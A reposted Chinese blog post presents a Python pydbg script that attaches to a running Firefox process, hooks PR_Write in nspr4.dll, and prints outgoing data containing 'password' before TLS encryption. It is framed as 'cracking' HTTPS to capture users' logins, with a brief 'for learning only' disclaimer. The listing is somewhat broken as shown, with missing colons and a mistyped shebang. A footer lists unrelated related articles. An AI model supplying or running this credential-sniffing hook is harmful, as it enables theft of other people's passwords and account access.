利用python的hook技术破解https

简介:

   相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后的内容,对我们的利用价值不是很高,所以一些大的网站----涉及到“大米”的网站,采用的都是http是协议,嘿嘿,即便这样,还是有办法能看到他的用户名和密码的,嘿嘿,本文只是用于技术学习,只是和大家交流技术,希望不要用于做违法的事情,这个例子是在firefox浏览器下登录https协议的网站,我们预先打开程序,就来了个捕获用户名和密码:

下面是源代码:

 
  1. #!/ur/bin/env python 
  2. from pydbg import * 
  3. from pydbg.defines import * 
  4.  
  5. import utils 
  6. import sys 
  7.  
  8. dbg = pydbg() 
  9. found_firefox = False 
  10.  
  11. pattern = "password" 
  12.  
  13.  
  14. def ssl_sniff( dbg, args ): 
  15.     buffer = "" 
  16.     offset = 0 
  17.     while 1
  18.         byte = dbg.read_process_memory( args[1] + offset, 1 ) 
  19.         if byte != "\x00"
  20.             buffer += byte 
  21.             offset += 1 
  22.             continue 
  23.         else
  24.             break 
  25.     if pattern in buffer: 
  26.         print "Pre-Encrypted: %s" % buffer 
  27.     return DBG_CONTINUE 
  28. # 寻找firefox.exe的进程 
  29. for (pid, name) in dbg.enumerate_processes(): 
  30.     if name.lower() == "firefox.exe"
  31.         found_firefox = True 
  32.         hooks = utils.hook_container() 
  33.         dbg.attach(pid) 
  34.         print "[*] Attaching to firefox.exe with PID: %d" % pid 
  35. # 得到firefox的hook的 address 
  36.         hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write"
  37.         if hook_address: 
  38. # 添加hook的内容,包括他的pid,地址,嗅探类型
  39.  
  40.             hooks.add( dbg, hook_address, 2, ssl_sniff, None ) 
  41.             print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address 
  42.             break 
  43.         else
  44.             print "[*] Error: Couldn't resolve hook address." 
  45.             sys.exit(-1
  46.         if found_firefox: 
  47.             print "[*] Hooks set, continuing process." 
  48.             dbg.run() 
  49.         else
  50.                 print "[*] Error: Couldn't find the firefox.exe process." 
  51.                 sys.exit(-1
  52.                  
  53. if found_firefox: 
  54.     print "[*] Hooks set, continuing process." 
  55.     dbg.run() 
  56. else
  57.     print "[*] Error: Couldn't find the firefox.exe process." 
  58.     sys.exit(-1

演示视频见链接:http://www.linux520.com/stcs/2011-03-18/174.html#ecms 

本文转自你是路人甲还是霍元甲博客51CTO博客,原文链接http://blog.51cto.com/world77/518679如需转载请自行联系原作者


world77

相关文章
|
3月前
|
存储 监控 API
Python实战:跨平台电商数据聚合系统的技术实现
本文介绍如何通过标准化API调用协议,实现淘宝、京东、拼多多等电商平台的商品数据自动化采集、清洗与存储。内容涵盖技术架构设计、Python代码示例及高阶应用(如价格监控系统),提供可直接落地的技术方案,帮助开发者解决多平台数据同步难题。
|
5月前
|
JSON API 开发者
天猫商品详情API接口技术解析与Python实现
天猫商品详情API(tmall.item_get)通过商品ID获取商品标题、价格、库存、图片、SKU及评价等详细信息,支持HTTP请求与JSON格式返回,适用于电商数据分析与运营。本文提供Python调用示例,实现快速接入与数据解析。
|
2月前
|
数据可视化 大数据 关系型数据库
基于python大数据技术的医疗数据分析与研究
在数字化时代,医疗数据呈爆炸式增长,涵盖患者信息、检查指标、生活方式等。大数据技术助力疾病预测、资源优化与智慧医疗发展,结合Python、MySQL与B/S架构,推动医疗系统高效实现。
|
3月前
|
数据采集 存储 XML
Python爬虫技术:从基础到实战的完整教程
最后强调: 父母法律法规限制下进行网络抓取活动; 不得侵犯他人版权隐私利益; 同时也要注意个人安全防止泄露敏感信息.
777 19
|
6月前
|
监控 大数据 API
Python 技术员实践指南:从项目落地到技术优化
本内容涵盖Python开发的实战项目、技术攻关与工程化实践,包括自动化脚本(日志分析系统)和Web后端(轻量化API服务)两大项目类型。通过使用正则表达式、Flask框架等技术,解决日志分析效率低与API服务性能优化等问题。同时深入探讨内存泄漏排查、CPU瓶颈优化,并提供团队协作规范与代码审查流程。延伸至AI、大数据及DevOps领域,如商品推荐系统、PySpark数据处理和Airflow任务编排,助力开发者全面提升从编码到架构的能力,积累高并发与大数据场景下的实战经验。
Python 技术员实践指南:从项目落地到技术优化
|
4月前
|
数据采集 机器学习/深度学习 数据可视化
Python量化交易:结合爬虫与TA-Lib技术指标分析
Python量化交易:结合爬虫与TA-Lib技术指标分析
|
5月前
|
机器学习/深度学习 数据安全/隐私保护 计算机视觉
过三色刷脸技术,过三色刷脸技术教程,插件过人脸python分享学习
三色刷脸技术是基于RGB三通道分离的人脸特征提取方法,通过分析人脸在不同颜色通道的特征差异
|
5月前
|
机器学习/深度学习 算法 API
淘宝图片搜索接口技术解析与Python实现
淘宝图片搜索接口(拍立淘)基于图像识别技术,允许用户上传商品图片查找相似或相同商品。自2014年上线以来,已服务数千万日活用户,显著提升购物体验。接口通过CNN、ANN等技术实现图像预处理、特征提取与相似度匹配,支持多种调用方式与参数设置。本文提供Python调用示例,便于开发者快速集成。
|
5月前
|
数据采集 自然语言处理 分布式计算
大数据岗位技能需求挖掘:Python爬虫与NLP技术结合
大数据岗位技能需求挖掘:Python爬虫与NLP技术结合
|
5月前
|
传感器 算法 数据挖掘
Python时间序列平滑技术完全指南:6种主流方法原理与实战应用
时间序列数据分析中,噪声干扰普遍存在,影响趋势提取。本文系统解析六种常用平滑技术——移动平均、EMA、Savitzky-Golay滤波器、LOESS回归、高斯滤波与卡尔曼滤波,从原理、参数配置、适用场景及优缺点多角度对比,并引入RPR指标量化平滑效果,助力方法选择与优化。
1237 0

推荐镜像

更多